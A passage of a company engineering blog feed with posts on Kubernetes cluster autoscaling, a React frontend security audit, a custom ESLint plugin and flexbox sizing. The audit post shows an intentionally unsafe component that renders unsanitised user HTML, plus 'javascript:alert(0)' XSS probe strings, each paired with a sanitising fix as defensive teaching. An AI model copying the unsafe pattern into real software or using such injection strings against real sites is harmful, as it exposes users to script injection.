Autoscaler</h3><p>While horizontal and vertical pod autoscaling operate on the level of individualdeployments, the Cluster Autoscaler scales in the context of the entire cluster.It increases or decreases the number of nodes in the cluster, making space formore deployments.</p><h2>The need for Cluster Autoscaler</h2><p>Suppose our Kubernetes cluster has three nodes. When we create deployments, ourapplications will be deployed to any of these three nodes based on the resourceavailability in the nodes. 
Without the Cluster Autoscaler, the number ofmachines running in our cluster will be fixed at 3.</p><p>If there is a sudden surge in traffic and we have to deploy 100 apps instead of10, the resources needed would overflow the three nodes' combined CPU and memoryresources. Essentially, our cluster will not have enough resources toaccommodate all the deployments, and the pods for our deployments will be stuckin the <code>Pending</code> state.</p><h2>How Cluster Autoscaler works</h2><p>The Cluster Autoscaler increases and decreases the number of nodes in ourcluster based on the number of deployments created. So in the above example, ifwe had the Cluster Autoscaler running, it would check if any pods are stuck in a<code>Pending</code> state, and if so, it'll spawn a new node in the cluster. If threenodes are not enough to accommodate all our deployments, the Cluster Autoscalerwould detect this and scale the cluster to four nodes.</p><p><strong>Let us see step by step how cluster autoscaler would work:</strong></p><ol><li>If our Kubernetes cluster is running at full capacity, the pods of a newlycreated deployment would have no space to fit in the cluster. In this case,the pod would be stuck in the <code>Pending</code> state and wouldn't be &quot;scheduled&quot; toany node.</li></ol><p><img src="/blog_images/2023/solving-scalability-in-neeto-deploy/cluster-autoscaler-1.png" alt="Illustration of pod stuck in pending state"></p><ol start="2"><li>The Cluster Autoscaler keeps checking if there are unscheduled pods. 
If so, the Cluster Autoscaler triggers a scale-up by provisioning a new node and attaching it to the cluster.</li></ol><p><img src="/blog_images/2023/solving-scalability-in-neeto-deploy/cluster-autoscaler-2.png" alt="Illustration of cluster autoscaler provisioning a new node"></p><ol start="3"><li>Once the new node has been provisioned, the capacity of the cluster has increased, and the pod, which was previously in the <code>Pending</code> state, will be scheduled to the newly created node.</li></ol><p><img src="/blog_images/2023/solving-scalability-in-neeto-deploy/cluster-autoscaler-3.png" alt="Illustration of the pending pod being scheduled to the newly provisioned node"></p><p>The same thing can happen in reverse as well. Consider the case where deployments are deleted or scaled down, and our nodes are not utilized completely.</p><p><img src="/blog_images/2023/solving-scalability-in-neeto-deploy/cluster-autoscaler-4.png" alt="Illustration of nodes being under-utilized"></p><p>In such a scenario, the Cluster Autoscaler would scale down the nodes so that only the minimum required resources are kept running. Existing deployments from different nodes would be rescheduled and &quot;packed&quot; into a smaller number of nodes before the unwanted machines are terminated. The Cluster Autoscaler marks unused nodes as <code>SchedulingDisabled</code> so that no pods are scheduled on or moved into these nodes.</p><p><img src="/blog_images/2023/solving-scalability-in-neeto-deploy/cluster-autoscaler-6.png" alt="Illustration of how pods are packed into minimum number required"></p><p>The Cluster Autoscaler then deprovisions the unused node.</p><p><img src="/blog_images/2023/solving-scalability-in-neeto-deploy/cluster-autoscaler-7.png" alt="Illustration of how unused nodes are deprovisioned"></p><p>The Cluster Autoscaler ensures that the cluster stays in a stable state where no pods are stuck in the <code>Pending</code> state and no under-utilized resources are kept running.
By default, the Cluster Autoscaler checks for pending pods and scale-down candidates every 10 seconds, but we can configure this interval to increase or decrease the speed at which the cluster autoscales.</p><h2>Deploying the Cluster Autoscaler</h2><p>The code for the Cluster Autoscaler is available at <a href="https://github.com/kubernetes/autoscaler">kubernetes/autoscaler</a>, and it can be used to set up the Cluster Autoscaler with any Kubernetes cluster.</p><p>All major cloud platforms like AWS, GCP, Azure, and DigitalOcean have Cluster Autoscaler support in their managed Kubernetes services. For example, if the Cluster Autoscaler is deployed on Amazon's Elastic Kubernetes Service (EKS), it would spawn new EC2 instances as needed and attach them to the EKS cluster's control plane. The complete list of supported cloud providers is <a href="https://github.com/kubernetes/autoscaler/tree/master/cluster-autoscaler#deployment">here</a>.</p><p>Since we are running NeetoDeploy on EKS, we referred to the documentation for setting up the autoscaler with EKS and created an OIDC identity provider in IAM. We then created an IAM policy for the autoscaler with the necessary permissions, such as <code>DescribeAutoScalingGroups</code> for describing the autoscaling groups in AWS and <code>SetDesiredCapacity</code> for changing the desired number of nodes in the cluster.</p><p>We then created an IAM role with the IAM policy and OIDC provider created earlier and used this role to set up RBAC in the cluster, along with the Cluster Autoscaler deployment. This ensures that the Cluster Autoscaler deployment has all the permissions it needs for inspecting pending pods and working with nodes.</p><h2>Seeing the autoscaler in action</h2><p>Once all of this was done, we created multiple deployments with larger memory and CPU limits in quick succession to see if the cluster could handle the increased load.
Even though the autoscaler took some time to react to the increased load, the cluster was scaled up according to the requirement, and none of the pods were stuck in the <code>Pending</code> state for long. Once we deleted our test deployments, the cluster automatically scaled back down.</p><p>If your application runs on Heroku, you can deploy it on NeetoDeploy without any change. If you want to give NeetoDeploy a try, then please send us an email at <a href="mailto:invite@neeto.com">invite@neeto.com</a>.</p><p>If you have questions about NeetoDeploy or want to see the journey, follow NeetoDeploy on <a href="https://twitter.com/neetodeploy">Twitter</a>. You can also join our <a href="https://launchpass.com/neetohq">community Slack</a> to chat with us about any Neeto product.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Audit of Your React Application & Safeguarding Your Web App]]></title>
       <author><name>Ajmal Noushad</name></author>
      <link href="https://www.bigbinary.com/blog/conducting-frontend-security-audit"/>
      <updated>2023-08-24T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/conducting-frontend-security-audit</id>
      <content type="html"><![CDATA[<h2>Introduction</h2><p>In the realm of web development, securing web applications is paramount to protect user data and ensure the integrity of the system. Regular frontend security audits are essential to identify and address vulnerabilities. In this blog post, we will explore the process of performing a frontend security audit specifically for React applications. We will highlight key areas to focus on to enhance the security of your React codebase.</p><h3>1. Verify the usage of dependencies</h3><p>Begin the frontend security audit by scrutinizing the dependencies used in your React application. Remove any unused dependencies to minimize potential attack vectors. Stay updated with the latest security patches and regularly update the dependencies to mitigate known vulnerabilities.</p><h3>2. Audit dependencies for security vulnerabilities</h3><p>Leverage tools like <code>yarn audit</code> or <code>npm audit</code> to scan your dependencies for any known security vulnerabilities. Stay vigilant in addressing these vulnerabilities promptly by updating to the latest secure versions or seeking alternative libraries when necessary.</p><h3>3. Guard against cross-site scripting (XSS)</h3><p>React is mostly safe from XSS attacks because, under the hood, it has built-in protection against them. React automatically encodes any user input before rendering it, ensuring that user input is never executed as code. This feature makes React almost inherently secure in terms of XSS vulnerabilities.</p><p>However, we can still choose to render user-provided HTML and scripts through the <code>dangerouslySetInnerHTML</code> prop or by using libraries like <code>html-react-parser</code> or <code>html-to-react</code>.
While doing this, we should use it only when it is absolutely necessary, and we must make sure we are sanitizing the raw HTML using a library like <code>DOMPurify</code>.</p><pre><code class="language-jsx">import DOMPurify from &quot;dompurify&quot;;
import htmlReactParser from &quot;html-react-parser&quot;;
import { Parser as HtmlToReactParser } from &quot;html-to-react&quot;;

const htmlToReactParser = new HtmlToReactParser();

const UnsafeComponent = ({ userProvidedHtml }) =&gt; {
  return (
    &lt;&gt;
      &lt;div dangerouslySetInnerHTML={{ __html: userProvidedHtml }} /&gt;
      &lt;div&gt;{htmlReactParser(userProvidedHtml)}&lt;/div&gt;
      &lt;div&gt;{htmlToReactParser.parse(userProvidedHtml)}&lt;/div&gt;
    &lt;/&gt;
  );
};

const SafeComponent = ({ userProvidedHtml }) =&gt; {
  const sanitizedHtml = DOMPurify.sanitize(userProvidedHtml);

  return (
    &lt;&gt;
      &lt;div dangerouslySetInnerHTML={{ __html: sanitizedHtml }} /&gt;
      &lt;div&gt;{htmlReactParser(sanitizedHtml)}&lt;/div&gt;
      &lt;div&gt;{htmlToReactParser.parse(sanitizedHtml)}&lt;/div&gt;
    &lt;/&gt;
  );
};</code></pre><p>Another XSS attack surface in React is URLs provided to anchor tags. React doesn't escape strings provided as HTML attribute props, so strings like <code>javascript:alert(0)</code> would trigger the JavaScript code when passed to the <code>href</code> prop of an anchor tag.</p><p>For example, the below anchor tag would trigger a browser alert dialog when clicked.</p><pre><code class="language-jsx">&lt;a href=&quot;javascript:alert(0)&quot;&gt;Click me&lt;/a&gt;</code></pre><p>Similarly, the code below would also trigger a browser alert dialog.</p><pre><code class="language-js">window.location.href = &quot;javascript:alert(0)&quot;;</code></pre><p>We have to be careful when using links inputted by users, whether we render them as anchor tags or redirect to them by setting <code>window.location.href</code>. To prevent such code from executing, we can use backend validations to make sure the links are valid and safe to use.
For additional safety, we could implement a whitelist of allowed protocols like <code>https</code> and <code>http</code> and reject all other protocols on the frontend.</p><pre><code class="language-js">const getSafeURL = url =&gt; {
  const parsed = new URL(url);
  if (parsed.protocol !== &quot;https:&quot; &amp;&amp; parsed.protocol !== &quot;http:&quot;) return;

  return url;
};</code></pre><p>Inspect links and redirect logic in your frontend code for potential cross-site scripting vulnerabilities. Validate user-inputted URLs to prevent unauthorized execution of malicious code. Implement measures to sanitize and escape user-generated content properly.</p><h3>4. Verify the necessity of third-party scripts</h3><p>Examine the third-party scripts included in your web application and verify their necessity. Remove any unused or unnecessary scripts, reducing the attack surface and potential risks.</p><h3>5. Load assets over secure protocols</h3><p>Ensure that all assets, such as images, fonts, stylesheets, and external scripts, are loaded over secure protocols such as <code>https</code>. Loading even a single asset over an insecure protocol like <code>http</code> can expose your application to potential security risks, and attackers can exploit this to steal sensitive information.</p><h3>6. Avoid attaching tokens to external API requests</h3><p>It is a common practice to have a default header configured for all API requests in an application. Libraries like <code>axios</code> allow us to configure a default header for all requests. This is useful when we need to attach an authentication token to all requests. However, this can be a potential security risk if we use the same axios instance to make requests to external APIs, because the authentication token would then also be attached to requests made to external APIs, which could be exploited by attackers to gain access to sensitive information. Use a separate instance without the default authentication headers for such external requests.</p><h3>7. 
Always encode URL paths and parameters</h3><p>It is crucial to consistently encode URL paths and parameters to prevent the execution of malicious code. Rather than manually encoding URLs each time, it is recommended to utilize libraries specifically designed for constructing URLs, such as <code>query-string</code> or <code>qs</code>. By leveraging these library functions, you can automate the encoding process and ensure that URLs are properly sanitized, minimizing the risk of security vulnerabilities associated with unencoded or improperly encoded data.</p><pre><code class="language-js">import qs from &quot;qs&quot;;

const params = {
  name: &quot;John Doe&quot;,
  age: 25,
};

const encodedParams = qs.stringify(params);
// encodedParams = &quot;name=John%20Doe&amp;age=25&quot;</code></pre><h3>8. Enhance script integrity with the &quot;integrity&quot; attribute</h3><p>To ensure script integrity, add the <code>integrity</code> attribute to externally loaded scripts. This attribute verifies that the script file hasn't been tampered with and matches the original source. It provides an additional layer of protection against malicious modifications.</p><pre><code class="language-html">&lt;script
  src=&quot;https://example.com/myscript.js&quot;
  integrity=&quot;sha384-AbCdIjK...&quot;
&gt;&lt;/script&gt;</code></pre><h3>9. Remove source maps from the production bundle</h3><p>Source maps are useful during development for debugging purposes, as they map the minified or transpiled code back to its original source code. However, in a production environment, making the source code easily accessible through source maps can pose a security risk. Attackers can analyze the source code to identify vulnerabilities, potentially exposing sensitive information or gaining insight into your application's inner workings. By disabling source maps, you reduce the risk of exposing your codebase to potential attackers. Source maps also provide an avenue for potential intellectual property theft.
Disabling source maps in the production build helps protect your intellectual property by making it harder for unauthorized parties to reverse engineer and steal your code.</p><p>Disabling source maps also limits how much attackers can learn about your application through extensions like React Devtools and Redux Devtools.</p><h3>10. Securely manage state</h3><p>Use proper state management practices in your React application. Avoid storing sensitive information in component state or global state management systems that can be accessed or modified by unauthorized users. Utilize techniques like secure context providers or server-side session management to handle sensitive data securely.</p><h3>11. Evaluate storage and data handling</h3><p>Carefully examine the usage of <code>localStorage</code>, <code>globalProps</code>, and <code>cookies</code> in your frontend code for sensitive data, such as user credentials, authentication tokens, user locations, API keys, and personally identifiable information. Implement encryption and secure protocols to protect sensitive data where required.</p><h3>12. Robust error handling</h3><p>Review your error handling mechanisms to ensure that error messages are informative but do not divulge sensitive system details or implementation specifics. Avoid logging or displaying error messages that could potentially aid attackers in exploiting vulnerabilities, like the one shown below.</p><pre><code class="language-js">try {
  // Some code that may throw an error
  const userData = await fetchUserData(userId);
} catch (error) {
  console.error(&quot;Error occurred while fetching user data:&quot;, error);
}</code></pre><p>Instead, log errors to a secure backend service and display a generic error message to the user.
This would prevent attackers from gaining access to sensitive information while still providing a good user experience.</p><pre><code class="language-js">try {
  // Some code that may throw an error
  const userData = await fetchUserData(userId);
  // Process the fetched data
} catch (error) {
  // Perform appropriate error handling, such as:
  // - Providing a user-friendly error message with helpful information
  // - Offering options for users to retry the operation
  // - Logging the error to a secure logging service for further analysis
  // - Implementing fallback behavior or graceful recovery if possible

  // Log the error to a secure logging service
  logError(error);

  // Display a user-friendly error message
  toast.error(&quot;Oops! Something went wrong. Please try again later.&quot;);
}</code></pre><h3>13. Enforce ESLint rules that prevent unsafe practices</h3><p>Leverage ESLint rules to enforce best practices and prevent unsafe coding practices. Below are some recommended ESLint plugins that can be used to identify and prevent potential security vulnerabilities in your application.</p><ul><li><p><a href="https://github.com/nodesecurity/eslint-plugin-security">eslint-plugin-security</a> identifies potential security hotspots, such as dangerous regular expressions, square bracket notation, etc.</p></li><li><p><a href="https://github.com/SonarSource/eslint-plugin-sonarjs">eslint-plugin-sonarjs</a> provides SonarJS rules for ESLint to detect bugs and suspicious patterns in your code.</p></li></ul><h3>14. Implement Content Security Policy (CSP)</h3><p>Content Security Policy is an HTTP header that helps mitigate various web vulnerabilities, including cross-site scripting (XSS) attacks. Define a robust CSP for your web application to specify the trusted sources from which various resources, such as scripts, stylesheets, or images, can be loaded. This restricts the execution of untrusted code and helps prevent XSS attacks.</p><h3>15. 
Regularly review and update security measures</h3><p>Perform periodic reviews and updates of your frontend security measures. Stay updated with the latest security best practices, vulnerabilities, and patches. Continuously monitor security advisories for your dependencies and promptly address any reported security vulnerabilities by updating to secure versions or migrating to alternative libraries.</p><h2>Conclusion</h2><p>Conducting a frontend security audit is an essential part of safeguarding your web application from potential threats. By following the outlined steps and implementing best practices, you can significantly reduce the risk of security breaches and protect your users' data and privacy. Remember, staying proactive in maintaining the security of your frontend codebase is crucial in an ever-evolving threat landscape.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Why did we build a custom ESLint plugin?]]></title>
       <author><name>Amaljith K</name></author>
      <link href="https://www.bigbinary.com/blog/eslint-plugin-neeto"/>
      <updated>2023-08-22T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/eslint-plugin-neeto</id>
      <content type="html"><![CDATA[<p>At <a href="https://neeto.com">neeto</a> we are working on <a href="https://blog.neeto.com/p/neeto-products-and-people">20+ products</a> simultaneously. While we were developing multiple products, we aimed to make all the products look like they were built by a single developer. They should have a consistent coding style and should follow our standards &amp; best practices.</p><p>The backend code was fairly clean because of the convention-over-configuration philosophy of the Ruby on Rails framework. But, since React is just a JS library, developers have complete freedom to write code in all possible ways JavaScript would allow.</p><p>In the initial stages, when we were building only 4-5 products, the only enforcement mechanism we had was pull request reviews, apart from basic linting using <a href="https://eslint.org/">ESLint</a> and code formatting using <a href="https://prettier.io/">Prettier</a>. PR reviews quickly turned inefficient as the number of products grew. The code reviewers started missing some of the newer changes to the coding standards and continued suggesting outdated standards. This led to inconsistent code and behavior between products.</p><p>At that time, we thought of building our own custom ESLint plugin. Initially, we expected it to be very hard because of the need to deal with the language AST to identify the code that didn't follow our standards. However, after some research, we discovered a FOSS tool, <a href="https://astexplorer.net">astexplorer</a>, which shows a visual representation of the JavaScript AST. With that, writing ESLint rules for non-standard code became easy.</p><p>The custom plugin was a huge success during the POC itself. It helped us significantly in improving the quality of the front-end code.
At the time of writing this blog, we have 50 custom ESLint rules enforced by the plugin.</p><p>The plugin was named <code>eslint-plugin-neeto</code>, adhering to <a href="https://eslint.org/docs/latest/extend/plugins#name-a-plugin">ESLint's plugin naming conventions</a>. Later, we namespaced it under <code>@bigbinary</code> to be consistent with our other frontend packages. Now the plugin is available as <a href="https://www.npmjs.com/package/@bigbinary/eslint-plugin-neeto"><code>@bigbinary/eslint-plugin-neeto</code></a>.</p><h2>Enforcing ESLint at neeto</h2><p>In the overall development flow, ESLint runs at three levels.</p><ol><li><h4>IDE extension (optional)</h4><p>Even though BigBinary doesn't have any IDE preference, the majority of our developers use <a href="https://code.visualstudio.com">Visual Studio Code</a>. The popular <a href="https://marketplace.visualstudio.com/items?itemName=dbaeumer.vscode-eslint">ESLint extension</a> for VS Code runs ESLint while the developer is writing code and gives immediate visual feedback with squiggly lines.</p><p><img src="/blog_images/2023/eslint-plugin-neeto/ide-extension.gif" alt="ESLint extension on VS Code"></p><p>The use of an IDE extension is completely optional. We have enforcement mechanisms at other levels to ensure code quality &amp; standards.</p></li><li><h4>Pre-commit hook</h4><p>There are some ESLint rules, like <a href="https://eslint.org/docs/latest/rules/sort-imports">sort-imports</a>, that are only meant to keep code consistency.
Even though, functionality-wise, there is nothing wrong with keeping the imports in any order, this rule would throw an error if the imports are not correctly sorted.</p><p>Moreover, developers will see this error frequently because most IDEs add the new import statement to the bottom of the imports list during auto-import.</p><p><img src="/blog_images/2023/eslint-plugin-neeto/import-order.gif" alt="Auto import and import-order errors"></p><p>But we believe that developers should not be concerned about errors like these. They should be focusing on the business logic rather than spending time on things that are auto-correctable. At the same time, we need this rule to be auto-fixed at some point to keep consistency.</p><p>So, we chose Git's pre-commit hooks for automatically fixing such errors. We used <a href="https://www.npmjs.com/package/husky">husky</a> to add the <code>eslint --fix</code> command to the pre-commit hook. Also, we used <a href="https://www.npmjs.com/package/lint-staged">lint-staged</a> to run the commands only on the files that are included in the current commit. Thus, we automated lint-fixing and formatting of the files that we are going to commit.</p><p>If any rule violations aren't auto-fixable, the commit fails with an error. Developers can get the details of the rule violation from the error message, make corrections themselves, and commit again.</p><p><img src="/blog_images/2023/eslint-plugin-neeto/precommit-hook.gif" alt="Pre-commit hook"></p></li><li><h4>CI checks</h4><p>The VS Code extension and pre-commit hooks are great tools that warn developers early and save time. However, they are not something we can rely on fully, because a developer can skip them if they prefer to.</p><p>Here are some cases where things might not work out:</p><ul><li>Lint checks from both the pre-commit hook and the VS Code extension won't run if the developer forgets to run <code>yarn install</code> while setting up the repository.
This is because the installation and setup of all the npm packages in a repository is done by the <code>yarn install</code> command. So the packages <a href="https://www.npmjs.com/package/eslint">eslint</a>, <a href="https://www.npmjs.com/package/husky">husky</a>, and <a href="https://www.npmjs.com/package/lint-staged">lint-staged</a> won't be available to run until <code>yarn install</code> is run.</li><li>Developers can manually skip Git's pre-commit hooks by running <code>git commit --no-verify</code>. The <code>--no-verify</code> flag says, in effect, &quot;I want to commit the changes, but I don't want the hooks to run and block me.&quot;</li></ul><p>To ensure that the code that goes into the repository is lint-free, we need to implement continuous integration (CI) checks. With CI checks in place, the PR (Pull Request) reviewer can know whether a PR meets the quality standards just by looking at this section of the PR:</p><p>Passing CI checks<img src="/blog_images/2023/eslint-plugin-neeto/ci-checks.png" alt="CI checks on github"></p><p>Failing CI checks<img src="/blog_images/2023/eslint-plugin-neeto/failed-ci-checks.png" alt="Failed CI checks on github"></p><p>In the CI checks, we run ESLint without the <code>--fix</code> flag. The goal of CI checks is to detect and report lint violations, not to correct them.</p><p>For CI, we are currently using an in-house tool named <a href="https://www.neeto.com/neetoci">NeetoCI</a>.</p></li></ol><h2>Challenges we faced</h2><p><a href="https://neeto.com">neeto</a> is building a lot of products. All these products had a lot of code written in a non-standard way. It meant that when we got started with the code standardization task, we had to deal with a large amount of code to fix.</p><p>Some of the non-standard code was auto-correctable. For such cases, we published ESLint rules with an auto-fixer.
Whenever anyone makes changes in a file containing that non-standard code pattern, it gets auto-corrected during the pre-commit hook execution. It was easy.</p><p>But some cases weren't auto-fixable. For such patterns, we published the ESLint rule and then asked a few engineers to go through all projects and run the command <code>eslint app/**/*.{js,jsx,json}</code>. It would reveal all pieces of code that violate the new rule. Those errors had to be fixed manually. We named this process <strong>rollout</strong>.</p><p>While doing this, we realized that we were not thinking much about false positives and true negatives. We started encountering them a lot during the rollout. It forced us to make fixes, publish the updates again to npm, and redo the rollout. This was inefficient.</p><p>After facing such incidents, we decided to clone all repos locally and test the changes in all products before raising a PR. Even though it was hard at the beginning, it proved to be quite effective in detecting all possible edge cases of a rule.</p><p>Later, we began developing rules for more complex, abstract standards. It was impossible to detect and flag all non-standard code patterns for them. If we stressed covering more cases, we would start getting several false positives along with them.</p><p>A good example would be the <code>hard-coded-strings-should-be-localized</code> rule. The aim was to force people to use <code>i18next</code>-based localization instead of hardcoding strings in English. In other words, all the strings that are supposed to be rendered on the DOM should come from the translation files.</p><p>If we were to flag all string literals as errors in the code, we would have more false positives than real errors. There were several strings, like <code>enum</code> keys, that were used only in the application logic.
They will never be rendered in the UI. There is no point in applying localization to them.</p><p>As you might guess, there is no way an ESLint plugin could tell whether a string is going to be rendered in the UI or is used only in the application logic. To circumvent this, we decided to raise an error only if the string contains a space character. Since enum keys didn't contain spaces, this eliminated a lot of false positives. But it created a lot of true negatives: we were missing all one-word strings that were rendered in the UI.</p><p>Also, even with that change, we didn't fully eliminate false positives. There were several cases where we used space-separated strings in the application logic. An example is the <code>classNames</code> prop. It usually contains a space-separated string of CSS classes (like <code>classNames=&quot;flex justify-center&quot;</code>).</p><p>To minimize such edge cases, we added a whitelist of property names like <code>classNames</code> that should always be ignored, and a blacklist of properties like <code>label</code> that should always be flagged even if the value is a single word. With that change, we were able to lower the false positives and true negatives to a great extent.</p><p>Even with all this logic in place, we weren't confident that we had eliminated false positives fully. So we decided to publish this rule as a warning. ESLint warnings are less strict than errors. The VS Code extension would still show yellow squiggly lines, and we would still get warning statements while running pre-commit hooks. But the pre-commit hook won't fail when a warning is encountered. The same applies to the CI checks.</p><p><img src="/blog_images/2023/eslint-plugin-neeto/eslint-warning.png" alt="ESLint warnings in VS Code"></p><h2>Lessons learned</h2><p>In the case of ESLint rules, false positives are more harmful than true negatives.
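The space-plus-list heuristic described above boils down to a small predicate; a simplified sketch (the list contents are illustrative, not the rule's actual internals):

```javascript
// Simplified sketch of the hard-coded-strings heuristic.
// The list contents are illustrative, not the rule's actual internals.
const IGNORED_PROPS = ["className", "classNames", "href"]; // never flag
const FLAGGED_PROPS = ["label", "title", "placeholder"]; // always flag

const shouldFlagString = (value, propName) => {
  if (IGNORED_PROPS.includes(propName)) return false; // e.g. CSS class strings
  if (FLAGGED_PROPS.includes(propName)) return true; // even one-word strings
  return value.includes(" "); // otherwise, flag only space-separated strings
};
```

Every branch of this predicate trades false positives against true negatives, which is exactly where the difficulty lies.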
If a false positive error is raised, it confuses the developers. Even though they are writing code in the right way, the plugin would complain that it is an error. Some developers might even write tricky code to circumvent the ESLint error, thinking that it is genuine.</p><p>We always try to minimize false positives by testing the rule with the existing code in several repos before publishing it. In some cases, we accept very rare false positives to avoid a large number of true negatives. If a developer encounters a false positive for such a rule, they are advised to disable the rule for that specific line of code.</p><p>Building ESLint rules not only helped us improve the code quality but also gave us exposure to AST parsing and manipulation. With the help of that new knowledge, we were able to accomplish several other things. As an example, we have built a custom Babel plugin that can generate the boilerplate code for <a href="https://github.com/pmndrs/zustand#selecting-multiple-state-slices">fetching values from a Zustand store</a> at compile time. You can read about how to build your own ESLint and Babel plugins in our upcoming blogs. Stay tuned.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Understanding the automatic minimum size of flex items]]></title>
       <author><name>Praveen Murali</name></author>
      <link href="https://www.bigbinary.com/blog/understanding-the-automatic-minimum-size-of-flex-items"/>
      <updated>2023-08-17T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/understanding-the-automatic-minimum-size-of-flex-items</id>
      <content type="html"><![CDATA[<h3>Introduction</h3><p>Flexbox is a powerful CSS layout module that allows us to create flexible and responsive user interfaces. However, when dealing with flex items that contain text, we may encounter issues where the text overflows its container, disrupting the user interface. In this article, we'll explore the problem of text overflow in flex items and learn about the automatic minimum size behavior of flex items.</p><h3>The problem</h3><p>Consider a scenario where we have a card component with a title that can be lengthy. To prevent the card from becoming too large and breaking the layout, we want to truncate the title and show an ellipsis when it overflows its container.</p><p>However, even after applying the necessary CSS properties such as <code>white-space: nowrap</code>, <code>overflow: hidden</code>, and <code>text-overflow: ellipsis</code> to <code>card__title</code>, the text doesn't truncate as expected. The card content doesn't shrink to accommodate the overflowing text, resulting in an undesired UI.</p><p><img src="/blog_images/2023/understanding-the-automatic-minimum-size-of-flex-items/the-issue.png" alt="issue.png"></p><p><strong>HTML</strong></p><pre><code class="language-html">&lt;div class=&quot;card&quot;&gt;
  &lt;div class=&quot;card__avatar&quot;&gt;&lt;/div&gt;
  &lt;div class=&quot;card__content&quot;&gt;
    &lt;p class=&quot;card__title&quot;&gt;This is anexampleofalengthytitle&lt;/p&gt;
    &lt;p class=&quot;card__description&quot;&gt;some text here&lt;/p&gt;
  &lt;/div&gt;
&lt;/div&gt;</code></pre><p><strong>CSS</strong></p><pre><code class="language-css">.card {
  display: flex;
  align-items: center;
  width: 260px;
  gap: 10px;
  padding: 10px;
  margin: 20px;
  background-color: #ffffff;
  border-radius: 10px;
}

.card__avatar {
  flex-shrink: 0;
  width: 50px;
  height: 50px;
  background-color: #aac4ff;
  border-radius: 50%;
}

.card__content {
}

.card__title {
  white-space: nowrap;
  overflow: hidden;
  text-overflow: ellipsis;
  font-size: 20px;
  margin: 0;
}

.card__description {
  font-size: 14px;
  margin: 0;
}</code></pre><h3>Why is it not shrinking?</h3><p>The default value of <a href="https://developer.mozilla.org/en-US/docs/Web/CSS/flex-shrink">flex-shrink</a> for a flex item is <code>1</code>, which means the <code>card__content</code> should be able to shrink as much as it needs to. Surprisingly, the result is not what we expected!</p><p>The flexbox algorithm refuses to shrink a child below its minimum size.</p><p>When there is text inside an element, the minimum size is determined by the length of the longest string of characters that cannot be broken.</p><p>From the flexbox specification:</p><blockquote><p>To provide a more reasonable default <a href="https://www.w3.org/TR/css-sizing-3/#min-width">minimum size</a> for <a href="https://www.w3.org/TR/css-flexbox-1/#flex-item">flex items</a>, the used value of a <a href="https://www.w3.org/TR/css-flexbox-1/#main-axis">main axis</a> <a href="https://www.w3.org/TR/css-sizing-3/#automatic-minimum-size">automatic minimum size</a> on a <a href="https://www.w3.org/TR/css-flexbox-1/#flex-item">flex item</a> that is not a <a href="https://www.w3.org/TR/css-overflow-3/#scroll-container">scroll container</a> is a content-based minimum size; for <a href="https://www.w3.org/TR/css-overflow-3/#scroll-container">scroll containers</a> the <a href="https://www.w3.org/TR/css-sizing-3/#automatic-minimum-size">automatic minimum size</a> is zero, as usual.</p></blockquote><h3>The solutions</h3><p>To overcome the issue of the flex item not shrinking as expected, we can apply one of the following solutions:</p><p><strong>Solution 1:</strong> Set <code>min-width: 0;</code></p><pre><code class="language-css">.card__content {
  min-width: 0;
}</code></pre><p>By explicitly setting <code>min-width: 0;</code> on the flex item, we can override the default behavior and allow the element to shrink beyond its automatic minimum size.
This change enables the flex item to adjust its size to accommodate theellipsis and prevent UI disruption.</p><p><img src="/blog_images/2023/understanding-the-automatic-minimum-size-of-flex-items/min-width-fix.gif" alt="May-26-2023 18-33-48.gif"></p><p><strong>Solution 2:</strong> Set <code>overflow: hidden;</code></p><pre><code class="language-css">.card__content {  overflow: hidden;}</code></pre><p>Setting <code>overflow: hidden;</code> alone can also help. This property ensures that anyoverflowing content is hidden, which indirectly allows the flex item to shrinkproperly.</p><p><img src="/blog_images/2023/understanding-the-automatic-minimum-size-of-flex-items/overflow-hidden-fix.gif" alt="May-26-2023 18-34-28.gif"></p><p><a href="https://codesandbox.io/s/the-automatic-minimum-size-of-flex-items-0fyimb?file=/src/styles.css"><strong>codesandbox demo</strong></a></p><h3>Conclusion</h3><p>Understanding the automatic minimum size behavior of flex items is crucial forcreating effective and visually pleasing web layouts. By implementing thesuggested solutions, you can overcome the challenges associated with textoverflow and achieve the desired UI outcomes.</p><p>Happy coding </p>]]></content>
    </entry><entry>
       <title><![CDATA[Debugging high GitHub action usage]]></title>
       <author><name>Unnikrishnan KP</name></author>
      <link href="https://www.bigbinary.com/blog/high-github-action-usage"/>
      <updated>2023-08-08T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/high-github-action-usage</id>
      <content type="html"><![CDATA[<p>During the development of <a href="https://neeto.com">neeto</a> we noticed arbitrarily veryhigh GitHub action usage. I investigated the matter and made this video to showto my team members how I went about debugging this issue. The video is beingpresented &quot;as it was recorded&quot;.</p><p>&lt;iframewidth=&quot;560&quot;height=&quot;315&quot;src=&quot;https://www.youtube.com/embed/eS4BAhk7DAo&quot;title=&quot;Debugging high GitHub action usage&quot;frameborder=&quot;0&quot;allow=&quot;accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture&quot;allowfullscreen</p><blockquote><p>&lt;/iframe&gt;</p></blockquote>]]></content>
    </entry><entry>
       <title><![CDATA[Upgrading to TLS 1.2 using Cloudflare]]></title>
       <author><name>Ghouse Mohamed</name></author>
      <link href="https://www.bigbinary.com/blog/upgrading-tls-using-cloudflare"/>
      <updated>2023-08-03T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/upgrading-tls-using-cloudflare</id>
